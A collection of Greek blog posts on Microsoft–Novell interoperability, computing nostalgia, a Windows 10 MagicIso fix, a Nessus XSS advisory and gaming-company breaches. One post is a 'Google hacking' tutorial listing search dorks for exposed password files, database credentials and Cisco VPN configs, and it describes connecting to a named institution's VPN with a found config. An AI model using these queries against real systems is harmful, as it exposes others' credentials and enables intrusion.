    Σε αυτό το σημείο ήρθε η συνεργασία της Microsoft με την Novell. Έτσι συμφώνησαν να αναπτύξουν προϊόντα σε ανοιχτά πρότυπα, έτσι ώστε όλοι εμείς να μην ανησυχούμε στο πως μπορούμε να δουλέψουμε διαφορετικές πλατφόρμες, ενοποιημένες σε ένα σύστημα.
    Η αρχική συνεργασία των δύο ήταν πάνω στα εξής 4: Virtualization,Standards Based Systems Management, Standards Based Identity and Federation, και Document Format Compatibility. Στην συνέχεια η συνεργασία προχώρησε περεταίρω και στα εξής 3: Moonlight, Linux Management for MS System Center, και Windows Accesibility.
    Virtualization (που είσαι Hyper-Vaggelaki;)
    Η συνεργασία σε επίπεδο Virtualization είχε να κάνει με το να εκμεταλλευτούν και οι δύο εταιρείες τον virtualization Hypervisor της άλλης (ένα χιαστί πράγμα δηλαδή). Αυτό έγινε εφικτό εφαρμόζοντας ένα σετ από VM adapters σχεδιασμένους για την επικοινωνία των XEN Visor και Windows Hyper V. Αυτοί οι λεγόμενοι Hyper-call adapters, μαζί με αντίστοιχους drivers για το storage και τις σχετικές συσκευές, μπήκαν σε ένα πακέτο και δόθηκαν στους πελάτες ως Linux Integration Components (Download). Αυτά τα components μπορεί κάποιος να τα κατεβάσει και να τα βάλει στο Guest λειτουργικό, όπου στην συνέχεια με μία απλή επανεκκίνηση ο χρήστης μπορεί να έχει όλα τα εξτρά (“additional performance of being and enlightened or para-virtualized guest” όπως τα αναφέρει η MS). Φυσικά στην περίπτωση μας, δεν μιλάμε γενικά για Linux, αλλά πιο συγκεκριμένα για το SUSE Linux το οποίο και υποστηρίζει η Novell και ουσιαστικά γίνεται το μοναδικό Linux λειτουργικό που υποστηρίζεται επίσημα στον Hyper-V. Πρόσφατα, η Microsoft προσέφερε στην κοινότητα του Open Source τα συγκεκριμένα components μέσω του GPL V2 License (όπου έχετε ξαναδιαβάσει και σε αυτό το blog).
    Το τελευταίο διάστημα τα πράγματα προχωράνε σε λύση Virtualization V2. Το μεγάλο ατού σε αυτό, είναι ότι πλέον το SUSE Linux όχι απλά υποστηρίζεται στον Windows Server 2008 R2, αλλά διατυμπανίζουν πλέον και την δυνατότητα του Live Migration. Που φτάσαμε; Πλέον όλοι θα μπορείτε να κάνετε ‘βόλτες’ από μηχάνημα σε μηχάνημα χωρίς downtime. (Που είσαι ρε Βαγγέλη Με αυτό τον τρόπο η MS κατάφερε να κλείσει το κενό που είχε με τον κύριο αντίπαλο της σε θέματα virtualization, που λέγετε VMWARE.

    Διαχείριση
    Σε αυτό το κομμάτι, οι δύο εταιρείες είχαν αρχικά συμφωνήσει προσκολλήσουν στο standard του WSMan πρωτοκόλλου για την διαχείριση συστημάτων (Systems Management). Έτσι και οι δύο εταιρείες χρησιμοποίησαν το παραπάνω standard για server monitoring αντίστοιχα στα Microsoft System Center Operations Manager και της Novell το Zenworks Management Platform. Αλλά αυτό δεν είναι το σημείο στο οποίο πρέπει να μείνουμε, καθώς από το 2008 δημιουργήθηκε το Linux Management Pack (download) από την Novell για να εγκατασταθεί μαζί με το System Center της Microsoft. Καλό ε; Έτσι με αυτό το πακέτο, μέσω του System Center ο admin θα μπορούσε να παρακολουθήσει 7 κύρια service όπως: Samba, Bind/DNS, DCHP, LDAP, CUPS, Firewall, και NFS. Φυσικά ο περιορισμός του συγκεκριμένου πακέτου είναι ότι επίσημα υποστηρίζει μόνο SUSE Linux.

    Identity and Federation
    Στο συγκεκριμένο κομμάτι, η συνεργασία των δύο εταιρειών έγινε πραγματικότητα μέσω των Active Directory Federation Service της Microsoft και του Access Manager της Novell. Και τα δύο αυτά προϊόντα συνεργάζονται μέσω των WS Federation Protocols, συμπεριλαμβανομένων και των WS Trust and WS Security. Με αυτό το μοντέλο οι πελάτες μπορούν να εκμεταλλευτούν εφαρμογές όπως το Microsoft SharePoint ή κάποια άλλα. Η προσπάθεια που γίνεται αυτή την στιγμή είναι η δημιουργία ενός πακέτου που θα επεκτείνει το SharePoint και σε περιβάλλοντα που δεν χρησιμοποιούν Active Directory.

    Moonlight
    Ακόμα ένα πράγμα που έχετε διαβάσει σε αυτό το blog, έχει να κάνει με την δημιουργεία του moonlight, που δεν είναι τίποτα άλλο από την δυνατότητα ύπαρξης του Silverlight στο Linux. Η συνεργασία σε αυτό το κομμάτι, έφερε το Silverlight και στους open source Browsers. Πλέον το Moonlight 2 είναι διαθέσιμο.
    Office Format Compatibility
    Επίσης ένας τομέας που έχει συζητηθεί και σε αυτό το blog, οπότε δεν θα επεκταθώ και έχει να κάνει με την συμβατότητα του Open Office και του MS Office και των format που αυτά χρησιμοποιούν. Προσωπικά πιστεύω ότι έχουν γίνει βήματα σωστά, αλλά υπάρχουν ακόμα αρκετά να γίνουν ώστε να μπορεί κάποιος να μιλήσει για πλήρης συμβατότητα.
    Accesibility Collaboration
    Ένα project το οποίο είναι εν εξελίξει και θα επιτρέπει το UIA (User Interface AUtomation) framework να λειτουργεί αρμονικά μέσα στα Linux Accessibility Projects.
    Επίλογος
    Η συνεργασία των δύο προχωράει και από αυτά που έχουν συμφωνηθεί, έχουμε και άλλα να δούμε. Περισσότερες από 475 μεγάλες εταιρείες παγκοσμίως βρίσκονται στο interop-πελατολόγιo των MS & Novell. Τα πράγματα προχωράνε προς αυτή την κατεύθυνση και οι σκληροπυρηνικοί linuxάδες απλά θα πρέπει να ξεκινήσουν να νιώθουν λίγο καλύτερα με την MS ή M$ όπως συνήθως την γράφουν. Όπως και να έχει το πράγμα, μην ξεχνάμε ότι όλα είναι business και τουλάχιστον εμείς οι χρήστες είμαστε αυτοί που έχουμε κέρδος από κάτι σαν και αυτό.
    Τα σχόλια; Δικά σας…
  7. Blackman
    Θυμάμαι όταν ήμουν μικρός πως είχαν νιώσει όταν είχα έρθει πρώτη φορά σε επαφή με ένα Commodore. Με είχαν πάρει η γιαγιά με τον παππού μαζί τους εκείνο το καλοκαίρι και οι γείτονες τους είχαν παιδιά, που αν και μεγαλύτερα από εμένα με φώναζαν να παίζουμε μαζί. Δεν με ένοιαζε που δεν με άφηναν να παίξω, λόγο ότι ήμουν αρκετά μικρός, με ένοιαζε που έβλεπα.

    Πέρασε λίγο διάστημα από τότε μέχρι να αποκτήσω και εγώ ένα δικό μου υπολογιστή που δεν ήταν άλλος από έναν Amstrad 6128 με πράσινη οθόνη. Τότε ένιωθα πολύ ωραία που έγραφα εντολές, που δεν ήταν κάτι το ιδιαίτερο και διάβαζα και περιοδικά του χώρου (Computer για όλους, Pixel, PC Master) και χανόμουν. Στην συνέχεια ήρθε να μπει στην ζωή μου αρχικά ένας 8086 και μετά ο υπέρτατος 80286 για την εποχή, με 10mb σκληρό δίσκο και 512kb μνήμη. Ήμουν θεός… με himem, έπαιζε τα πάντα και μιλάμε για εποχή MS-DOS 3.01



    Την συνέχεια την ξέρουμε όλοι, με την έλευση των Windows και την επιτυχία των 3.11. Δεν είχα πολύ επαφή τότε, δεν μου άρεσε το ποντίκι. Εγώ ήθελα να γράφω, να νιώθω ότι εγώ λέω στο μηχάνημα τι να κάνει και όχι ένα πλήθος εντολών πίσω από το δικό μου κλικ. Μαζί με τα 3.11 ήρθα και σε επαφή με το Unix. Ωραίες αναμνήσεις… στην συνέχεια πήγα στην σχολή και είχαμε windows 95 και Unix. Τι να διαλέξω να ‘παίξω’ εκείνη την περίοδο; Μα τι άλλο, Unix φυσικά. Αυτό έγινε λίγο από εγωισμό, καθώς τότε θυμάμαι στο Lab, παίζαμε Doom 2 και μία άλλη φορά που παίζαμε Duke Nukem δίκτυο με τα υπόλοιπα παιδιά του τμήματος και είχε έρθει αυτός το σπαστικός ο γυαλάκιας από το τελευταίο έτος να μας κόψει τα connections από τον server.



    Έκατσα και διάβασα λίγο, έμαθα μερικές εντολές και την επόμενη φορά του την έφερα εγώ. Να είναι καλά και ένα συμφοιτητής που είχα τότε, με ψευδώνυμο Turrican (ιστορικό παιχνίδι) που με βοήθησε σε αυτά που έκανα τότε. Η συνέχεια είχε πολύ από… Microsoft. Τι άλλο φυσικά. Από τότε θυμάμαι που όλοι κατηγορούσαν την μονοπωλιακή πολιτική της Microsoft, αλλά όλοι δούλευαν με Windows.



    Ναι, ήταν o μπαμπούλας από τα παραμύθια που ήρθε να τα φάει όλα. Έτσι ήταν και στο δικό μου μυαλό και όσο δούλευαν στα συστήματα της και όσο ‘έτρωγα’ τις αξιολάτρευτες Blue Screen of Death, απανωτά από Windows 95, Windows 98, Windows Millennium (το υπέρτατο blue screen), Windows 2000, έβρισα και έλεγα τα χειρότερα για την Microsoft. 

    Κάπου εκεί την εποχή των Millennium σε ένα παλιό PCάκι που είχα φόρτωσα linux. Suse πρέπει να ήταν και θυμάμαι πόσο καιρό το έστηνα, προσπαθώντας να βρω drivers. To αποτέλεσμα όμως με έκανε και ένιωθα τόσο ικανοποιημένος, αλλά συνάμα κουρασμένος από την όλη διαδικασία.

    Ωραία πλέον είχα να λέω Linux και πάλι Linux… αλλά πάλι τα περισσότερα πράγματα στα Windows τα έκανα. Εκείνη την εποχή ειδικότερα οι δυνατότητες όμως που σου έδινε η κονσόλα ενός Unix/Linux συστήματος ήταν απλά… αλλού. Είχα γίνει κακό παιδάκι τότε… η πρώτη μου επαφή με το Internet είχε έρθει κάπου το 1993 και τα επόμενα χρόνια ήμουν χωμένος σε όλα τα IRC chatrooms (είχα ζήσει και τους IRC servers της Microsoft). Μιλάμε για περίοδο με πολλά vulnerabilities, nukes, DDOS attacks, Trojans κλπ, έδιναν και έπαιρναν ειδικά στο IRC. Με Linux, απλά δεν έπεφτες και τους έριχνες εύκολα. Τι πιο σπαστικό από να τσακώνεσαι με κάποιον online και εκείνος να σου κόβει την σύνδεση. Ε τι άλλο να γίνει με τις pstn και τα modems; Μία αξιοπρεπής γραμμή, μερικά έως πολλά pings και τσουπ… disconnected. Δεν θα ξεχάσω που γύρω στο 2001 έκανα δοκιμές από το σπίτι στους servers της δουλειάς μου τότε (Windows NT SP4). ( Όχι δεν κατάφερα να κάνω τίποτα)

    Μετά ήρθαν τα Windows XP και τότε μάλλον τα πράγματα πήραν άλλη τροπή. Σε όλο τον κόσμο η Microsoft δεχόταν την μία μήνυση μετά την άλλη για την μονοπωλιακή πολιτική της, αλλά το νέο σύστημα της ήταν πιο σταθερό. Full Windows XP ο κύριος από εδώ και παιχνίδια, πολλά παιχνίδια αφού είχαμε DirectX σε τρομερά επίπεδα για την εποχή. Το linux δεν υποστήριζε DirectX (ούτε υποστηρίζει), οπότε no fancy graphics. Κάποια στιγμή ήρθα σε επαφή με το Ubuntu. XP στο ένα PC, Ubuntu στο άλλο και τότε ξεκίνησαν τα καλά. Είχα βάλει σκοπό ντε και καλά να έχω πλήρες λειτουργικό δίκτυο και με τα δύο συστήματα. Τα windows να δουν το linux; ΧΑΧΑΧΑΧΑΧΑ… ακόμα γελάω. Από την άλλη πλευρά όμως, είχα SAMBA. Έβλεπα shares, μετέφερα αρχεία, έβλεπα ταινίες, είχα remote desktop και διάφορα άλλα. Γενικότερα το linux είχε διάφορα στοιχεία τα οποία τα είδα αρκετά αργότερα στα Vista και πλέον στα 7. User Account Control το είπε η Microsoft, αλλά στο Linux είχαν άλλα πριν καιρό, sudo το λένε στο Ubuntu. Εφέ στα παράθυρα και Dreamscene η Microsoft, αλλά εδώ και κάτι χρόνια παίζουμε με combiz στο linux.



    Αρκετά κοινά στοιχεία τα τελευταία χρόνια και αυτό γιατί; Γιατί απλά, όπως το βλέπω εγώ, η Microsoft έβαλε μυαλό. Όχι ότι δεν θέλει να τα φάει όλα, απλά θέλει πλέον μερίδιο και από εκεί που δεν έτρωγε. Μία σκέψη που έπρεπε να την είχε κάνει καιρό και φυσικά μιλάμε για Business. Βλέπω τις κοινότητες του Linux να αντιδρούν όταν έμαθαν ότι η Microsoft ανοίγει τον κώδικα της, ότι έδωσε 20000 γραμμές στην Open Source κοινότητα, ότι έρχεται κοντά στους σκληροπυρηνικούς Linuxάδες.

    Η Microsoft από το 2003 αποφάσισε να μπει στον χώρο του Open Source και του Interoperability.  Η σκέψη είναι απλή. Δεν λέει σε κανένα πλέον να μην χρησιμοποιήσει linux, αλλά του λέει να δει πόσο αρμονικά δουλεύει με άλλα δικά της προϊόντα το linux σύστημα που ο πελάτης χρησιμοποιεί. Ο Linus Torvalds, ο άνθρωπος που δημιούργησε τον πυρήνα του Linux, έδειξε ιδιαίτερα θετικός στην νέα στάση της Microsoft. Άτομα που δούλευαν σε τρίτες εταιρείες ειδικευμένοι σε άλλα συστήματα, εργάζονται πλέον για την Microsoft στο αντίστοιχο κομμάτι του Interoperability. Άτομα που ήταν χρόνια απέναντι από την Microsoft, βρέθηκαν να εκφράζουν τον ενθουσιασμό τους για την νέα πορεία που έχει πάρει πλέον η εταιρεία.

    Βρίσκομαι πλέον εν έτη 2009, σε μία κατάσταση bisexual σε σχέση με τους υπολογιστές. Ναι, χρησιμοποιώ ακόμα και τα δύο συστήματα και με την έλευση της τεχνολογίας virtulization, μιλάμε για system orgies. Domain Controller WS2008 r2, με Ubuntu, Windows XP, Windows 7, Suse, Mint κ.α., σε ανελέητες δοκιμές με sharepoint server 2007, SCCOM και διάφορα άλλα. Ωραία πράγματα. Και οι δύο πλευρές έχουν μεγαλώσει. H Microsoft ίσως να βρίσκετε στην πιο ισχυρή θέση από ποτέ, δείχνοντας πλέον ένα πραγματικά πιο ανθρώπινο πρόσωπο, την ίδια ώρα που η Open Source κοινότητα αυξάνεται συνεχώς και δυναμώνει.



    Ξέρω πλέον ότι δεν μπορώ να κάνω εύκολα και ‘κακό’ από Linux σε ένα σύστημα Windows, αλλά ξέρω ότι πλέον έχω εγκατεστημένο antivirus στον υπολογιστή μου που έχει linux. Παλιά αυτό ήταν ανέκδοτο. Στο εργασιακό κομμάτι, δεν μπορώ να συστήσω τίποτα άλλο, από Microsoft, στο σπίτι όμως και ανάλογα τις απαιτήσεις συνιστώ Linux. Μάλλον θα περάσει καιρός, μέχρι να δούμε κάτι αντίστοιχο με τα repositories που έχουν τα linux συστήματα, όπου κατεβάζεις ότι θες τσάμπα, όποτε το θες.

    Πριν λίγα χρόνια έκανα μία έρευνα αγοράς, ώστε να δω αν συνέφερε να βάλω linux σε κάποια clients για να μειωθεί το κόστος. Η σκέψη αυτή ήταν γιατί οι συγκεκριμένοι υπολογιστές ήταν μόνο για Internet, email και office. Στην αναζήτηση μου ήρθα σε επαφές με εταιρείες που υποστηρίζουν linux συστήματα και εγκαταστάσεις για να δω τι γίνεται. Τελικά κατέληξα ότι το να το κάνεις μόνος σου είναι τσάμπα, αλλά αν θες να κάνεις κάτι σε εργασιακό επίπεδο πρέπει να πληρώσεις το support και σε αυτή την κατάσταση είναι που έρχεται μία ή άλλη. Που πάμε καλύτερα για την άλλη, που είναι και πιο σίγουρο και έχει και υποστήριξη από την μαμά Microsoft. Αλλά αυτό και πάλι είναι προσωπική άποψη.

    Πάντως για τους φίλους του Open Source, να γνωρίζουν ότι πλέον υπάρχει και MS-PL (Microsoft Public License) και περισσότερο οι developers είναι αυτοί που μπορούν να έχουν άμεση επαφή με αυτό το κομμάτι. Οι υπόλοιποι πρέπει να περιμένουμε εκείνους, για να έχουμε κάτι απτό, το οποίο θα δείξει στην πορεία του χρόνου.

    Ο καιρός περνάει και οι αλλαγές είναι πολλές και συνεχόμενες. Από την εποχή που διαμορφώναμε το autoexec.bat μαζί με το config.sys, μέχρι να φτάσουμε στην εποχή του System Center και του Exchange 2010.



    Την εποχή που μέναμε κολλημένοι σε μία οθόνη παίζοντας Monkey Island, για να περάσουμε από το Phantasmagoria και να φτάσουμε τώρα στο World of Warcraft και το Resident Evil. Από το DOS, σε Solaris, σε Windows, σε Linux, σε Mac OS πλέον βρισκόμαστε σε μία κατάσταση… παγκοσμιοποίησης. Τα πάντα μπορούν να δουλέψουν μεταξύ τους και πλέον αρμονικά σε θεμιτό βαθμό.









    Είμαι βέβαιος ότι ξύπνησα αναμνήσεις σε πολλούς και σίγουρα αρκετοί θα θέλατε να συζητήσουμε πράγματα πάνω σε αυτό και για το παρελθόν. Θα δώσουμε ραντεβού στο ITproconnections τον Νοέμβρη. Be there.<?xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:office" />



     

    Μερικά ενδιαφέροντα links.



     http://www.retromaniax.gr/


    http://elkosmas.gr/2009/07/24/linus-torvald-no-ms-hate/


    http://www.opensource.org/licenses/ms-rl.html


    http://www.cmswire.com/cms/web-development/taking-a-closer-look-at-microsofts-mspl-open-source-license-004248.php


    http://www.microsoft.com/resources/sharedsource/default.mspx


    http://weblogs.asp.net/scottgu/archive/2008/01/16/net-framework-library-source-code-now-available.aspx


    http://tips.developersvoice.com/bsd-or-gpl-choosing-an-open-source-license.html


    http://www.interoperabilitybridges.com/



     


     


     
  8. Blackman
    Μετά από καιρό ξαναγράφω, για να καταγράψω ένα θέμα που είχα και δεν το έχει λύσει κανείς ή τουλάχιστον δεν είναι καταγεγραμμένο κάπου (τουλάχιστον όσο έψαξα εγώ).
     
    Η κατάσταση: Αναβάθμιση Windows 7 Pro σε Windows 10
     
    Είχα διαθέσιμο το iso, οπότε δεν χρειάστηκε να βάλω το σύστημα να το κατεβάσει. Έβαλα το MagicIso/MagicDisk για να κάνω Mount τα 10ρια και στην συνέχεια ξεκίνησα την αναβάθμιση των Windows.
     
    Όλα καλά και όλα όμορφα. Είχα Windows 10.
     
    Όμως όταν πήγα να σβήσω το iso των windows από το σημείο που το είχα έλεγε ότι χρησιμοποιείται. ΟΚ λέω και εγώ...δεξί κλικ -> eject.
     
    Αμ δε...
    Παρόλο που σαν εικονίδιο το έδειχνε να φεύγει, ο virtual δίσκος ήταν ακόμα εκεί.
     
    Με την αναβάθμιση το MagicIso δεν βρισκόταν πουθενά. Ούτε στα προγράμματα, ούτε στο notification bar. Πουθενά.
     
    Διάβασα διάφορους που έλεγαν να σβήσεις την registry με ότι εγραφές υπάρχουν. Άλλοι που έλεγαν να μπεις σε safe mode και να το κάνεις. Αλλά όχι...τίποτα δεν δουλεύει από αυτά.
     
    Ακόμα και στο Device Manager, πας και βρίσκεις το MagicIso disk, αλλά ακόμα και disable ή uninstall να κάνεις, αυτό παραμένει εκεί.
     
    Λύση:
     
    Για να μην σας ζαλίζω.
    Πάμε στο Windows.old (ε τα 10ρια μας δίνουν την δυνατότητα να γυρίσουμε μέσα σε ένα μήνα στο παλιό μας σύστημα), βρίσκουμε τον φάκελο του MagicIso μέσα στα Program Files. Ανοίγουμε από εκεί το MagicIso από το σχετικό exe. Μας το εμφανίζει στο Notification και πάμε και κάνουμε Unmount το iso.
     
    Σβήνουμε το iso μας και στην συνέχεια πατάμε και μία το Unwize που είναι στον φάκελο ώστε να γίνει απεγκατάσταση (ότι έχει μείνει βρε αδερφέ) του συγκεκριμένου προγράμματος.
     
    Αυτά τα λίγα!
    τώρα αυτό είναι πλέον documented!
  9. Blackman
    Όλοι μας είμαστε λίγο πολύ εξοικειωμένοι με το Nessus.
    Αυτοί που δεν γνωρίζουν, το Nessus Vulnerability Scanner της
    Tenable Network Security είναι μία εφαρμογή που δουλειά της
    είναι να ελέγχει το δίκτυο και να αναφέρει το πόσο ευάλωτο
    είναι το κάθε σύστημα στις επιθέσεις, εμφανίζοντας μία πληθώρα
    από πληροφορίες όπως το ποιες πόρτες είναι ανοιχτές και διάφορα άλλα.
     
     
     
    The Situation
     
     
     
    Το Nessus έχει ένα server που τρέχει και στον οποίο δίνουμε τα αιτήματα
    μας για τις αναζητήσεις μας. Για να το εκτελέσουμε μπορούμε να
    χρησιμοποιήσουμε είτε την client εφαρμογή ή το WEB UI.
     
     
     
    Αρχές του καλοκαιριού ο φίλτατος Frank Lycops από το The Security Factory,
    βρήκε ότι το web-based user interface ήταν ευάλωτο σε επίθεση XSS (Cross Site Scripting).
     
    Συγκεκριμένα όπως αναφέρει η ίδια η Nessus τέλος Αυγούστου:
     
    The Nessus scanner's web-based user interface (Web UI) was vulnerable to
    a stored cross-site scripting (XSS) attack. The issue was due to a security
    control being briefly removed due to a regression error. During this 48
    hour window, one new build of the Web UI was released leading to the ability
    to inject arbitrary script code. This could be done by setting up a malicious
    web server that returned a crafted host header containing JavaScript.
    When Nessus scanned the web server, the input would be passed as-is and
    render when viewing a report.
     
    Proof Of Concept


    Λύση
     
    Η λύση είναι απλή. Η Tenable διόρθωσε το πρόβλημα στην επόμενη έκδοση, συνεπώς όσοι έχετε εγκατεστημένη την έκδοση με Web UI verson 2.3.3, αναβαθμήστε στην 2.3.4 του Web UI.
     
    πηγές:
    http://www.exploit-db.com/exploits/34929/
    http://www.tenable.com/security/tns-2014-08
    http://www.thesecurityfactory.be/permalink/nessus-stored-xss.html
  10. Blackman
    SONY… pwn3d
    Nintendo… pwn3d
    Square Enix… pwn3d
    Epic Games… pwn3d
    SEGA… pwn3d

    Ντου από παντού φαίνεται ότι δέχονται οι εταιρείες που κοινό τους στοιχείο είναι οι παιχνιδομηχανές ή τα παιχνίδια και φυσικά η βάση δεδομένων με τα στοιχεία εκατομυρίων χρηστών τους. Ένα ακόμα σημείο είναι ότι οι hackers χτυπάνε…και τα παίρνουν ΟΛΑ και φεύγουν.
    Τελευταίο θύμα η SEGA όπου έκλεψαν τα στοιχεία 1,3 εκατομμυρίων παικτών της μαζί με κωδικούς και άλλα προσωπικά στοιχεία. Ευτυχώς αυτή την φορά δεν πήραν και τα στοιχεία των πιστωτικών καρτών. Το πήραν χαμπάρι την περασμένη Παρασκευή και έκλεισαν αμέσως το σύστημα για να μην έχουν άλλη διαρροή. Μέχρι και την Δευτέρα το site της ήταν ‘κάτω’ με το εξής μήνυμα:
    "Sega Pass is going through some improvements so is currently unavailable for new members to join or existing members to modify their details including resetting passwords. We hope to be back up and running very soon. Thank you for your patience."
    Από πλευράς hackers δεν έχει αναλάβει ακόμα την ευθύνη κανείς και η ομάδα Luiz Security ανέφερε ότι δεν είχε καμία σχέση με το συγκεκριμένο γεγονός. Εν αντιθέσει έκαναν post στον λογαριασμό τους στο twitter το παρακάτω:
    "We want to help you destroy the hackers that attacked you. We love the Dreamcast, these people are going down,"
    Αλλά αυτό είναι η μία μορφή επιθέσεων που έχουμε αντιμετωπίσει μέχρι στιγμής και φυσικά αναλύθηκε διεξοδικά και στο πρόσφατο AthCon. Όλα γίνονται για τα λεφτά και να δούμε ποιος θα πουλήσει αυτά τα στοιχεία που…
    Αλλά αν αυτό το θεωρείτε κακό… τι να πουν και στην Αυστραλία…
    όπου 4800 ιστοσελίδες ΔΙΑΓΡΑΦΗΣΑΝ παντελώς από τον ηλεκτρονικό χάρτη, χωρίς ΚΑΜΙΑ πιθανότητα επαναφοράς. Γιατί; Γιατί οι hackers κατάφεραν και χτύπησαν έναν καταχωρητή domain που έκανε και web hosting με όνομα Distribut.IT. Η ζημιά ήταν τόσο μεγάλη, καθώς 4 servers κρίνονται ότι είναι UNRECOVERABLE, βάση αναφορών. H Distribute.IT προσπαθεί να επαναφέρει όσα στοιχεία μπορεί, αλλά αυτό είναι δύσκολο καθώς οι hackers έσβησαν ΟΧΙ μόνο τα δεδομένα, αλλά και βασικά backups, snapshots και άλλες πληροφορίες που θα βοηθούσαν στην επαναφορά των δεδομένων.
    Έτσι οι πελάτες της εν λόγο εταιρείας πρέπει να στήσουν τα site τους από την αρχή. Ενώ επίσης η Distribut.IT δεν έχει δώσει πλήρη αναφορά για το χτύπημα, ώστε να βεβαιώσει τις εταιρείες για το τι ακριβώς έχει συμβεί και τι στοιχεία πιθανόν να έχουν κλαπεί.
    Μιλάμε πλέον για ηλετρονικό πόλεμο ή μόνο για ηλεκτρονικό έγκλημα;
  11. Blackman
    Το Google είναι ένα εργαλείο πλέον για την ζωή μας, αν και πρόσφατα η Microsoft δημιούργησε το bing.com, πολλοί από εμάς χρησιμοποιούμε ακόμα φανατικά την μηχανή του Google.
    Πολλοί έχουμε ακούσει τον όρο “Google hack”. Ναι οκ. Δηλαδή τι γίνεται; Πως γίνεται; Τι ακριβώς είναι, δεν νομίζω ότι έχουμε απαντήσει πολλοί σε αυτό.
    Για αυτό ήρθα εγώ να σας βάλω λίγο στην ιδέα. Η μηχανή του Google μας δίνει την δυνατότητα (ναι όλοι μπορούμε να το κάνουμε) να ψάξουμε σε κάθε τι που υπάρχει στο Internet, δίνοντας στον απλό χρήστη με την χρήση κάποιων ‘εντολών’ να περάσει μέσα από τρύπες που έχουν οι web servers.
    Ας δούμε όμως κάποια παραδείγματα.
    Sample 1
    Πηγαίνετε στο Google και γράψτε…
    intitle: "index of" mp3
    όπου ουσιαστικά φαίνεται καθαρά το τι γράφω. Φέρε μου τις σελίδες όπου στον τίτλο έχουν την λέξη “Index Of” και περιέχει πληροφορίες με όνομα mp3.

    τα αποτελέσματα που μας φέρνει είναι

    και πηγαίνοντας σε μία σελίδα βλέπουμε πχ

    Αν πληκτρολογήσετε το παραπάνω θα δείτε ότι την συγκεκριμένη εντολή την χρησιμοποιούν πολλοί για να βρουν αρχεία, από συγκεκριμένες σελίδες με την συγκεκριμένη περιγραφή.
    Sample 2
    Μία άλλη ενδιαφέρουσα εντολή είναι η
    !Host=*.* intext:enc_UserPassword=* ext:pcf
    όπου στην συγκεκριμένη περίπτωση βάζω pcf για να μου επιστρέψει configuration files για Cisco routers.

    μας φέρνει κάποια αποτελέσματα

    και επιλέγοντας πχ το πρώτο, μας έρχεται το παγωτό στο χέρι…

    Ωραία…τι έχουμε τώρα; Έχουμε το configuration file για τον Cisco router του European University Institute, το οποίο το σώζουμε σαν pcf στο pc μας και αν έχετε Cisco VPN Client, το βάζετε και συνδέεστε στο σύστημα τους. Δεν μπαίνετε μέσα, καθώς θα ζητήσει username και password, αλλά έχετε κάνει το πρώτο connection. Από εκεί και πέρα είναι θέμα επιπέδου γνώσεων το πως μπορεί κάποιος να εκμεταλλευτεί αυτό που μόλις ανέφερα.
    Sample 3
    Μία πιο περίπλοκη εντολή όπως η παρακάτω…
    "# -FrontPage-" ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-" inurl:service.pwd
     
     
     
    δείτε τι κάνει. Αναζητεί τους web servers που έχουν δημιουργηθεί με FrontPage και ζητάμε να δούμε τα password που εμπεριέχει το αρχείο που αναφέρετε ως service.pwd

    τα αποτελέσματα που μας φέρνει είναι τα εξής:

    όπου τυχαία κλικάροντας σε κάποιες σελίδες έχουμε αποτελέσματα όπως…


    στα παραπάνω φαίνεται καθαρά ότι αυτό που έψαξε, αυτό βρήκε. Δηλαδή στο Url να εμπεριέχεται το service.pwd.
    Εντυπωσιακό ε;
    --------------
    Φυσικά οι εντολές που μπορείτε να χρησιμοποιήσετε στο google είναι πραγματικά πολλές και με λίγο ψάξιμο δεν θα δυσκολευτείτε να τις βρείτε. Αλλά να θυμάστε ότι αρκετές από αυτές τις εντολές λειτουργούν και στις υπόλοιπες search engines.
    Για να έχετε καλύτερη γεύση…
    μπορείτε να δείτε και εντολές όπως οι παρακάτω:
    "your password is" filetype:log allinurl: admin mdb ext:inc "pwd=" "UID=" ext:asa | ext:bak intext:uid intext:pwd -"uid..pwd" database | server | dsn filetype:dat "password.dat" filetype:inc intext:mysql_connect filetype:log inurl:"password.log" eggdrop filetype:user user intext:"enable secret 5 $" inurl:/db/main.mdb Σε γενικές γραμμές βλέπετε ότι υπάρχουν κάποιες σταθερές εντολές, όπου ο καθένας μπορεί να κάνει αναζήτηση. Έτσι με το filetype αναζητάς για τύπους αρχείων, με το Intext να εμπεριέχεται σε κείμενο η λέξη που θα βάλουμε, ενώ με το inurl να εμπεριέχεται στο URL.
    Υπάρχουν όμως και ποιο πολύπλοκες εντολές αναζήτησης, όπως ενδεικτικά σας παραθέτω…
    "Warning: mysql_connect(): Access denied for user: '*@*" "on line" -help –forum filetype:log "PHP Parse error" | "PHP Warning" | "PHP Error" intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*" intitle:"SuSE Linux Openexchange Server" "Please activate Javascript!" intitle:"teamspeak server-administration intitle:"Tomcat Server Administration" intitle:"TOPdesk ApplicationServer" intitle:"DocuShare" inurl:"docushare/dsweb/" -faq -gov -edu -----------------------------------------
    Ευελπιστώ μετά από αυτό το blog post, να αποκτήσατε μία εικόνα για το τι εστί google hacking. Καταλαβαίνετε ότι το Google Hack δεν είναι κάτι διαφορετικό από μία μεγάλη γκάμα vulnerability exploits. Από εκεί και πέρα είναι στο θέμα του χρήστη για το πως θα το χρησιμοποιήσει.
    Για ότι άλλο θέλετε απλά…Google It…
  12. Blackman
    Ώρα 11:43 το βράδυ. Τα φώτα είναι κλειστά και τα μάτια κλείνουν από την νύστα. Σκέφτομαι να κλείσω τον υπολογιστή και να ξαπλώσω, αλλά εκείνη την στιγμή πέφτει το μάτι μου σε κάτι ενδιαφέρον. Κάποιος αναφέρει ότι πρέπει να σπάσει τον ‘keykeeper’.
    Στην αναζήτηση μου συγκλωνίζομαι και η αδρεναλίνη αρχίζει να ανεβαίνει. Βρίσκομαι συνδεδεμένος στο σύστημα του ποιο μεγάλου και επικίνδυνου καρτέλ ναρκωτικών του Μεξικού. Με την αδρεναλίνη στα ύψη, κοιτάζω μέσα στο σκοτεινό δωμάτιο μου κλεφτές ματιές σε κενά σημεία, νιώθωντας σαν να με παρακολουθεί κανείς.
    Βρίσκω στοιχεία ότι μία νέα μεγάλη παράδωση ναρκωτικών πρόκειται να γίνει στις Ηνωμένες Πολιτείες και εκει αναρωτιέμαι “Blackman σύνελθε…άσε αυτά τα πράγματα στην ησυχία τους”. Και θα τα παρατούσα λίγο πριν πέσω πάνω σε κάτι ‘άκυρες’ εικόνες. Φωτογραφίες με λουλούδια, αρχεία που τα βρίσκεις σε υπολογιστή σπιτιού και όχι σε κάτι τέτοιο.
